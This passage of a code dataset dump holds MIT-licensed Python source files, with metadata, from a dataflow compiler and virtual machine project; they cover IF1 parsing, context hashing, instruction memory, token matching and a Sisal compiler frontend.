scope(subGraph):\n\tglobal __STACK__\n\t__STACK__ = [Scope(subGraph)] + __STACK__\n\n##\n# Create a new compound scope and push it\n# on top of the stack.\n##\ndef scopeCompound():\n\tglobal __STACK__\n\t__STACK__ = [CompoundScope()] + __STACK__\n\n##\n# Remove the current scope.\n# Returns to the previous scope.\n##\ndef popScope():\n\tglobal __STACK__\n\tif len(__STACK__) > 1:\n\t\t__STACK__ = __STACK__[1:]\n\n##\n# Get the node with label in the current scope.\n#\n# \\param label\n#\t\tThe label to look for.\n##\ndef getNode(label):\n\treturn __STACK__[0].getNode(label)\n\n##\n# Add node with label to the current scope.\n#\n# \\param label\n#\t\tThe IF1 label of the node.\n# \\param node\n#\t\tThe node to add\n##\ndef addNode(label, node): \n\t__STACK__[0].addNode(label, node)\n\n##\n# Get the subgraph of the current scope.\n##\ndef getSubGraph():\n\treturn __STACK__[0].getSubGraph()\n\n##\n# Add a subgraph to the compound scope.\n# This will cause errors if the current\n# scope is not a compound scope.\n##\ndef addSubGraph(graph):\n\t__STACK__[0].addSubGraph(graph)\n\n##\n# Get the subgraphs.\n# This will cause errors if the current\n# scope is not a compound scope.\n##\ndef getSubGraphs():\n\treturn __STACK__[0].graphs\n\n# ----------------- #\n# Compound Checking #\n# ----------------- #\n\n## \n# Keeps track of the level of depth\n# w.r.t. 
a compound definition.\n# \n# This allows us to handle nested compound\n# nodes without issues.\n##\n__COMP_LEVEL__ = 0\n\n## Are we currently in a compound node?\ndef isCompound():\n\treturn __COMP_LEVEL__ is not 0\n\n## Enter a compound node.\ndef enterComp():\n\tglobal __COMP_LEVEL__\n\t__COMP_LEVEL__ += 1\n\n## Exit a compound node.\ndef exitComp():\n\tglobal __COMP_LEVEL__\n\t__COMP_LEVEL__ -= 1" }, { "alpha_fraction": 0.7018669843673706, "alphanum_fraction": 0.7082847356796265, "avg_line_length": 26, "blob_id": "d84b5e3749c52133bf5a7e369ec388dc9f258786", "content_id": "095e1a95a2de9eda67cade04da25415bce05c7f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "no_license", "max_line_length": 79, "num_lines": 127, "path": "/DVM/core/context.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# context.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.context\n# \\brief DVM Contexts\n# \n# This module defines contexts.\n# Contexts allow us to add extra state to the\n# runtime. They make it possible to have multiple inputs\n# to the same instruction (e.g. multiple instances of the same function).\n##\n\nfrom math import sqrt, floor\n\n##\n# DVM Context\n#\n# A context is the part of a token tag.\n# Contexts differentiate between various instances\n# of a single part of the program.\n# \n# For instance, when calling a function, DVM will create a new context\n# shared by all the arguments to this function. 
Upon returning, the context\n# will be used to find the destination of the function results.\n#\n# Internally, a context is a wrapper around a unique integer.\n##\nclass Context(object):\n\tdef __init__(self, core, key):\n\t\tsuper(Context,self).__init__()\n\t\tself.hash = self.hashPair(core, key)\n\t\tself.core = core\n\n\tdef __str__(self):\n\t\treturn \"{\" + str(self.hash) + \"}\"\n\n\tdef __eq__(self, other):\n\t\treturn self.hash == other.hash\n\n\tdef __hash__(self):\n\t\treturn self.hash\n\n\t## \n\t# Generate a unique, integral identifier\n\t# for a pair of non-negative integers.\n\t#\n\t# \\see http://szudzik.com/ElegantPairing.pdf\n\t# \\see http://stackoverflow.com/a/13871379\n\t##\n\tdef hashPair(self, a, b):\n\t\tif a >= b:\n\t\t\treturn a ** 2 + a + b \n\t\telse:\n\t\t\treturn b ** 2 + a\n\n\t##\n\t# Unhashes the hash.\n\t#\n\t# \\return a (prefix, key) pair\n\t# \\see slide 8 of http://szudzik.com/ElegantPairing.pdf\n\t##\n\tdef unhashPair(self):\n\t\th = self.hash\n\t\ta = None\n\t\tb = None\n\n\t\tsqrtFloor = floor(sqrt(h))\n\t\tsqrtFloorSq = sqrtFloor ** 2\n\n\t\tif (h - sqrtFloorSq) < sqrtFloor:\n\t\t\ta = h - sqrtFloorSq\n\t\t\tb = sqrtFloor\n\t\telse:\n\t\t\ta = sqrtFloor\n\t\t\tb = h - sqrtFloorSq - sqrtFloor\n\n\t\treturn (a,b)\n\n##\n# Context creator\n#\n# Allows the generation of new contexts.\n#\n# A context creator has a unique prefix.\n# Having this prefix allows us to have multiple context \n# creators that generate unique contexts without synchronizing.\n##\nclass ContextCreator(object):\n\tdef __init__(self, core):\n\t\tself.core = core.identifier\n\t\tself.current = 0\n\t\tself.available = []\n\n\tdef get(self):\n\t\t#if self.available:\n\t\t#\treturn self.available.pop()\n\t\t#else:\n\t\tres = self.current\n\t\tself.current += 1\n\t\treturn Context(self.core, res)\n\n\tdef restore(self, context):\n\t\tself.available.append(context)" }, { "alpha_fraction": 0.679592490196228, "alphanum_fraction": 0.6881366968154907, "avg_line_length": 26.423423767089844, "blob_id": "267dd4fb7f816ff9a742f2c1c19524cda8a0196e", "content_id": "4bb5b6e0ed544e95c0c1406e1079a153cb445326", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3043, "license_type": "no_license", "max_line_length": 79, "num_lines": 111, "path": "/DISc/frontEnd/IF1/edge.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# edge.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.edge\n# \\brief Parse edges and literals\n# \n# This module is responsible for parsing \n# IF1 edges and literals and adding them to \n# the IGR.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\nimport IGR\nimport IGR.node\n\nimport environment\nimport type\n\n# --------- #\n# Constants #\n# --------- #\n\n# E <source_node> <port> <destination_node> <port> <type>\n_e_src_idx = 1\n_e_srcp_idx = 2 \n_e_dst_idx = 3\n_e_dstp_idx = 4\n_e_type_idx = 5\n\n# L destination_node port type string \n_l_dst_idx = 1\n_l_dstp_idx\t= 2\n_l_type_idx = 3\n_l_str_idx = 4\n\n# ----------- #\n# Edge Parser #\n# ----------- #\n\n## Parse an IF1 edge \ndef parseEdge(arr, ctr):\n\tsrcLabel = int(arr[_e_src_idx])\n\tdstLabel = int(arr[_e_dst_idx])\n\tsrcPort = int(arr[_e_srcp_idx]) - 1\n\tdstPort\t = int(arr[_e_dstp_idx]) - 1\n\tsrcNode = environment.getNode(srcLabel)\n\tdstNode = environment.getNode(dstLabel)\n\n\tIGR.connect(srcNode, srcPort, dstNode, dstPort)\n\n# -------------- #\n# Literal Parser #\n# -------------- #\n\n## Parse a literal string that represents a basic type\ndef _parseBasicLit(str, typ, ctr):\n\tif typ.type is int:\n\t\treturn int(str)\n\telif typ.type is bool:\n\t\treturn str == \"T\"\n\telse:\n\t\tlog.error(\"Line %d, Unsupported literal, %s encountered.\", ctr, str)\n\n## Parse a literal string.\ndef _parseLitStr(str, typ, ctr):\n\tstring = str[1:-1] #strip enclosing \"\"\n\tif isinstance(typ, type._BasicType):\n\t\treturn _parseBasicLit(string, typ, ctr)\n\telif isinstance(typ, type._FunctionType):\n\t\treturn string\n\telse:\n\t\tlog.error(\"Line %d, Unsupported literal, %s encountered.\", ctr, str)\n\n## Parse an IF1 literal\ndef parseLiteral(arr, ctr):\n\tlabel = int(arr[_l_dst_idx])\n\tport = int(arr[_l_dstp_idx]) - 1\n\ttypeKey = int(arr[_l_type_idx])\n\tstring = arr[_l_str_idx]\n\n\tnode = environment.getNode(label)\n\ttyp = type.getType(typeKey)\n\tval = _parseLitStr(string, typ, ctr)\n\n\tIGR.addLiteral(val, node, port)" }, { "alpha_fraction": 0.7269613146781921, "alphanum_fraction": 0.7321000099182129, "avg_line_length": 28.484848022460938, "blob_id": "d84b814176a22844a0172b001eeffe8022bc33a0", "content_id": "0b9833a5a8982cab3fa321c8eebcd8922a36d0f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2919, "license_type": "no_license", "max_line_length": 79, "num_lines": 99, "path": "/DVM/core/memory.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# memory.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", 
WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.memory\n# \\brief DVM instruction memory\n#\n# This module defines the instruction memory,\n# which stores all the instructions in the program.\n##\n\n##\n# The Instruction memory stores all of the \n# instructions in the program.\n#\n# An instruction memory is divided into chunks.\n# Each of these chunks stores instructions with \n# certain properties. The exact properties are\n# determined by the outside world.\n##\nclass InstructionMemory(object):\n\n\t##\n\t# Initialize the memory.\n\t#\n\t# \\param chunks\n\t#\t\tThe amount of chunks this memory contains.\n\t##\n\tdef __init__(self, chunks):\n\t\tsuper(InstructionMemory, self).__init__()\n\t\tself.memory = [[] for i in xrange(0, chunks)]\n\n\t##\n\t# Add an instruction to the memory.\n\t##\n\tdef add(self, inst):\n\t\tkey = (inst.chunk, len(self.memory[inst.chunk]))\n\t\tlst = self.memory[inst.chunk]\n\t\tlst.append(inst)\n\t\tinst.setKey(key)\n\t\treturn key\n\n\t##\n\t# Get an instruction from memory.\n\t##\n\tdef get(self, key):\n\t\treturn self.memory[key[0]][key[1]]\n\n## Main instance of the instruction memory\n__MEMORY__ = InstructionMemory(2)\n\n## Get a reference to the instruction memory\ndef memory(): return __MEMORY__\n\n## Delete all the contents of the instruction memory.\ndef reset(): \n\tglobal __MEMORY__ \n\t__MEMORY__= InstructionMemory(2)\n\n## Get an instruction from the main memory\ndef get(key): return memory().get(key)\n\n## Add an instruction to the main memory.\ndef add(inst): \n\treturn memory().add(inst)\n\n## \n# See if an instruction needs to pass the matcher.\n# Instructions that require a context matcher are stored\n# in a separate part of the memory, so checking the key suffices.\n#\n# \\param key\n#\t\tThe key of the instruction \n# \\return \n#\t\tTrue if the instruction needs to be matched.\ndef needsMatcher(key): return key[0] == 1\n" }, { "alpha_fraction": 0.7305361032485962, "alphanum_fraction": 0.7375291585922241, "avg_line_length": 31.101449966430664, "blob_id": "5fb6ce864d6c8063bee1ea...", "content_id": "a099b2bb7293a24cc6d7da3825d8dd1c465f4dd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2145, "license_type": "no_license", "max_line_length": 79, "num_lines": 69, "path": "/DISc/frontEnd/Sisal.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial 
portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport subprocess\nimport tempfile\nimport IF1\nimport sys\nimport os\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# \\package frontEnd.Sisal\n# \\author Mathijs Saey\n# \n# \\brief DISc Sisal FrontEnd.\n#\n# This module calls sisalc (has to be in your path), and uses the IF1\n# frontend to parse the results.\n#\n# Since Sisalc seems to be unable to accept input from stdin, we use\n# temporary files to interact with Sisal. \n##\n\ndef fromString(str):\n\t# Create a temp file and run sisalc on it\n\tfile = tempfile.NamedTemporaryFile(suffix = '.sis', prefix = 'DIScTmp')\n\tname = file.name\n\tfile.write(str)\n\tfile.flush()\n\n\ttry:\n\t\tFNULL = open(os.devnull, 'w')\n\t\tsubprocess.check_call([\"sisalc\", \"-IF1\", name], stdout = FNULL)\n\texcept subprocess.CalledProcessError:\n\t\tlog.error(\"Error while compiling Sisal file!\")\n\t\tsys.exit(1)\n\n\t# Get the name of the output file\n\tname = name.replace('.sis', '.if1')\n\n\t# Open the file and run the IF1 frontend on it.\n\tfile = open(name)\n\tIF1.fromString(file.read())\n\tfile.close()" }, { "alpha_fraction": 0.6492267847061157, "alphanum_fraction": 0.6565977931022644, "avg_line_length": 24.72490692138672, "blob_id": "9e064229ac4b8805dd65f5a9c02e8ef410385457", "content_id": "7210eaecf47f2a34a26ba02cd252b3d2035d3613", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6919, "license_type": "no_license", "max_line_length": 79, "num_lines": 269, "path": "/DISc/frontEnd/IF1/type.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# type.py\n# Mathijs Saey\n# DISc\n\t\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.type\n# \\brief Type parser\n# \n# Discover IF1 types.\n# For an introduction on how types are represented in\n# IF1, check out the [IF1 reference](md_doc__i_f1.html#types)\n##\n\nimport logging\n# Logging levels do not propagate decently for some reason\n# if the name contains .IF1\nlog = logging.getLogger('frontEnd.IF1_type')\n\n# -------------------- #\n# Forward declarations #\n# -------------------- #\n\ndef _Tag(arr): \t\t_parseTag(arr) \t\ndef _Tuple(arr): \t_parseTuple(arr) \ndef _Union(arr): \t_parseUnion(arr) \ndef _Array(arr): \t_parseArray(arr) \ndef _Basic(arr): \t_parseBasic(arr) \ndef _Field(arr): \t_parseField(arr) \ndef _Record(arr): \t_parseRecord(arr) \ndef _Stream(arr): \t_parseStream(arr) \ndef _Function(arr): _parseFunction(arr)\ndef _Multiple(arr): _parseMultiple(arr)\n\n# --------- #\n# Constants #\n# --------- #\n\n# T <label> <type_code> <arg_1> <arg_2>\n_label_idx \t= 1 \n_code_idx \t= 2\n_arg_1_idx \t= 3\n_arg_2_idx \t= 4\n\n## The function that is needed to parse a given idx\n_type_codes = {\n\t 0 : _Array,\n\t 1 : _Basic,\n\t 2 : _Field,\n\t 3 : _Function,\n\t 4 : _Multiple,\n\t 5 : _Record,\n\t 6 : _Stream,\n\t 7 : _Tag,\n\t 8 : _Tuple,\n\t 9 : _Union\n}\n\n## Basic type codes and the python types to match them\n_basic_types = {\n\t0 : bool,\n\t1 : str, # Python has no built-in character\n\t2 : float,\n\t3 : int,\n\t4 : None,\n\t5 : float,\n\t6 : str\n\t#6 : WildBasic \tType not mentioned in the reference manual\n}\n\n# ------------------- #\n# Type representation #\n# ------------------- #\n\nclass _Type(object): pass\n\n##\n# Represents any possible type\n##\nclass _UnknownType(_Type):\n\tdef __init__(self):\n\t\tsuper(_UnknownType, self).__init__()\n\t\tself.list = []\n\t\tself.type = None\n\n\tdef __str__(self):\n\t\treturn \"Unknown Type\"\n\n##\n# Represents one of the basic IF1 types.\n##\nclass _BasicType(_Type):\n\tdef __init__(self, type):\n\t\tsuper(_BasicType, self).__init__()\n\t\tself.type = type\n\n\tdef __str__(self):\n\t\treturn \"Basic Type: \" + str(self.type)\n\n##\n# Wrapper around a container that contains\n# a single base type (such as an array)\n##\nclass _ContainerType(_Type):\n\n\tdef __init__(self, baseType, containerType):\n\t\tsuper(_ContainerType, self).__init__()\n\t\tself.base = baseType\n\t\tself.container = containerType\n\n\tdef __str__(self):\n\t\treturn \"Container: \" + self.container + \" \" + self.base.__str__()\n\n##\n# Wrapper around a combined type that contains multiple base types\n#\n# The wrapper represents the full type starting at its index.\n# So if we have a tuple (int, str, int), then we would have 3\n# _CombinedType instances, one that represents the full type,\n# one that represents (str, int) and one that represents (int).\n##\nclass _CombinedType(_Type):\n\tdef __init__(self, type, containerType, next = None):\n\t\tsuper(_CombinedType, self).__init__()\n\t\tself.type = containerType\n\t\tself.list = [type]\n\t\tif next:\n\t\t\tself.list += next.list\n\n\tdef __str__(self):\n\t\tres = \"Combined: (\" + self.type + \")\"\n\t\tfor el in self.list:\n\t\t\tres += \" <\" + str(el) + \">\"\n\t\treturn res\n\n##\n# Wrapper around a pointer to the first element of a combined type\n##\nclass 
_PointerType(_Type):\n\tdef __init__(self, dest, containerType):\n\t\tsuper(_PointerType, self).__init__()\n\t\tself.type = containerType\n\t\tself.dest = dest\n\n\tdef __str__(self):\n\t\treturn \"Pointer: (\" + self.type + \"): \" + self.dest\n\n\tdef follow(self):\n\t\treturn getType(self.dest)\n\n##\n# Wrapper around a function type\n##\nclass _FunctionType(_Type):\t\n\tdef __init__(self, args, res):\n\t\tsuper(_FunctionType, self).__init__()\n\t\tself.args = args\n\t\tself.res = res\n\n\tdef __str__(self):\n\t\tres = \"Function: \\n\"\n\t\tres += \"\\t arg: \" + str(self.args) + \"\\n\"\n\t\tres += \"\\t res: \" + str(self.res)\n\t\treturn res\n\n# --------- #\n# Type Pool #\n# --------- #\n\n##\n# Store all the encountered types\n##\nclass _TypePool(object):\n\tdef __init__(self):\n\t\tsuper(_TypePool, self).__init__()\n\t\tself._type_pool = {0 : _UnknownType()}\n\n\tdef __str__(self):\n\t\tres = \"Type pool:\\n\"\n\t\tfor key, value in self._type_pool.iteritems():\n\t\t\tres += \"\\t\" + str(key) + \": \" + str(value) + \"\\n\"\n\t\treturn res\n\n\tdef addType(self, arr, type):\n\t\tkey = int(arr[_label_idx])\n\t\tself._type_pool.update({key : type})\n\n\tdef getType(self, key):\n\t\treturn self._type_pool[int(key)]\n\n_pool = _TypePool()\n\n##\n# Get a type from the pool\n##\ndef getType(label):\n\treturn _pool.getType(label)\n\n# ------ #\n# Parser #\n# ------ #\n\ndef parseType(arr, ctr):\n\tfuncKey = int(arr[_code_idx])\n\ttry:\n\t\tfunc = _type_codes[funcKey]\n\texcept KeyError:\n\t\tlog.warning(\"Line %d, Unknown type code %s encountered.\", ctr, funcKey)\n\t\t_pool.addType(arr, _UnknownType())\n\telse:\n\t\tfunc(arr)\n\ndef _parseBasic(arr):\n\tbase_type = _basic_types[int(arr[_arg_1_idx])]\n\t_pool.addType(arr, _BasicType(base_type))\n\ndef _parseFunction(arr):\n\targs = getType(arr[_arg_1_idx])\n\tres = getType(arr[_arg_2_idx])\n\t_pool.addType(arr, _FunctionType(args, res))\n\ndef _parseContainer(arr, container):\n\tbase_type = getType(arr[_arg_1_idx])\n\t_pool.addType(arr, _ContainerType(base_type, container))\n\ndef _parseCombinedPtr(arr, container):\n\tdest = arr[_arg_1_idx]\n\t_pool.addType(arr, _PointerType(dest, container))\n\ndef _parseCombined(arr, container):\n\tbaseType = getType(arr[_arg_1_idx])\n\t\n\t# Add the new type, if there is a previous, link to it\n\ttry:\n\t\tnext = getType(arr[_arg_2_idx])\n\texcept KeyError:\n\t\t_pool.addType(arr, _CombinedType(baseType, container))\n\telse:\n\t\t_pool.addType(arr, _CombinedType(baseType, container, next))\n\ndef _parseTag(arr): \t\t_parseCombined(arr, \"tag\")\ndef _parseTuple(arr): \t\t_parseCombined(arr, \"tuple\")\ndef _parseField(arr): \t\t_parseCombined(arr, \"field\") \ndef _parseArray(arr):\t\t_parseContainer(arr, \"array\")\ndef _parseStream(arr):\t\t_parseContainer(arr, \"stream\")\ndef _parseMultiple(arr):\t_parseContainer(arr, \"multiple\")\ndef _parseUnion(arr):\t\t_parseCombinedPtr(arr, \"Union\") \ndef _parseRecord(arr): \t\t_parseCombinedPtr(arr, \"Record\")" }, { "alpha_fraction": 0.675000011920929, "alphanum_fraction": 0.6797727346420288, "avg_line_length": 26.829267501831055, "blob_id": "b8b4f15b2ef8d040c3c98bcc4e30c43406345a07", "content_id": "44b75e710056ebb15980337839fd2d5007cec99e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4400, "license_type": "no_license", "max_line_length": 79, "num_lines": 164, "path": "/DVM/core/contextMatcher.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# 
contextMatcher.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.contextMatcher\n# \\brief DVM context matcher\n# \n# This module defines the DVM context matcher.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# DVM Context matcher.\n#\n# The matcher is responsible for gathering inputs \n# to the same instruction based on their contexts.\n# The matcher should forward these tokens to the scheduler once\n# all of the inputs for a given context are available.\n#\n# The matcher utilizes <i>(instruction, context)</i> pairs as **keys**\n##\nclass ContextMatcher(object):\n\n\t##\n\t# Initialize a context matcher.\n\t#\n\t# \\param core\n\t#\t\tThe runtime core that this matcher\n\t#\t\tis a part of.\n\t##\n\tdef __init__(self, core):\n\t\tsuper(ContextMatcher, self).__init__()\n\n\t\t## Dictionary that contains the tokens for all the keys\n\t\tself.tokens = {}\n\n\t\t## Reference to the DVM::Core\n\t\tself.core = core\n\n\t##\n\t# Dynamically set the amount\n\t# of tokens a certain instruction should receive.\n\t#\n\t# \\param inst\n\t#\t\tThe address of the instruction to set the token amount for.\n\t# \\param cont\n\t#\t\tThe context for which this amount is valid. 
\n\t# \\param amount\n\t#\t\tThe amount of tokens this matcher requires for this key.\n\t##\n\tdef setKey(self, inst, cont, amount):\n\t\tkey = (inst, cont)\n\n\t\tarr = [None] * amount\n\t\tself.tokens.update({key : [arr, 0, amount]})\n\n\t##\n\t# See if a given key is already a part of the \n\t# tokens we are matching.\n\t# \n\t# Create an array to match these tokens if it's not.\n\t#\n\t# \\param key\n\t#\t\tThe key to check\n\t##\n\tdef checkKey(self, key):\n\t\tif key not in self.tokens:\n\t\t\tinst = self.core.memory.get(key[0])\n\t\t\tarr = [None] * inst.totalInputs\n\t\t\tinp = inst.realInputs\n\t\t\tself.tokens.update({key : [arr, 0, inp]})\n\n\t##\n\t# Update the token array for a key\n\t# This method assumes that there is an array for the\n\t# given key.\n\t#\n\t# \\param key\n\t#\t\tThe key to find the array we want to update.\n\t# \\param port\n\t#\t\tThe destination port of the token we want to add.\n\t# \\param token\n\t#\t\tThe token we want to add.\n\t##\n\tdef updateKeyArr(self, key, port, token):\n\t\tpair = self.tokens[key]\n\t\tif not pair[0][port]:\n\t\t\tpair[0][port] = token\n\t\t\tpair[1] += 1\n\t\telse:\n\t\t\tlog.warning(\"Duplicate token received!\")\n\n\t##\n\t# See if all the input tokens are present\n\t# for a given key.\n\t#\n\t# \\param key\n\t#\t\tThe key to check\n\t# \n\t# \\return \n\t#\t\tTrue if all the input tokens are present for key.\n\t##\n\tdef isKeyReady(self, key):\n\t\tpair = self.tokens[key]\n\t\treturn pair[1] == pair[2]\n\n\t##\n\t# Add the tokens for key to the scheduler.\n\t##\n\tdef executeKey(self, key):\n\t\tlog.info(\"Executing key: (%s, %s)\", key[0], key[1])\n\t\tarr = self.tokens[key][0]\n\t\tdel self.tokens[key]\n\t\tself.core.scheduler.schedule(key[0], arr)\n\n\t## \n\t# Add a token to the matcher\n\t# \n\t# This method can be seen as the main method of the\n\t# matcher as it utilizes all the other methods to define\n\t# the behaviour that the matcher will use when a token is added.\n\t#\n\t# \\param token\n\t#\t\tthe token to add.\n\t##\n\tdef add(self, token):\n\t\tlog.info(\"Adding token: %s\", token)\n\n\t\ttag = token.tag \n\t\tinst = tag.inst \n\t\tcont = tag.cont \n\t\tport = tag.port \n\t\tkey = (inst, cont)\n\n\t\tself.checkKey(key)\n\t\tself.updateKeyArr(key, port, token)\n\n\t\tif self.isKeyReady(key):\n\t\t\tself.executeKey(key)\n" }, { "alpha_fraction": 0.6973100304603577, "alphanum_fraction": 0.7014886140823364, "avg_line_length": 29.157480239868164, "blob_id": "b9bd2fc8bcd32a65bd63159c5cd6f1d173e39632", "content_id": "7ce04a675f7a0fb4b70fd519012801cea292fd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3829, "license_type": "no_license", "max_line_length": 128, "num_lines": 127, "path": "/DVM/dvm.py", "repo_name": 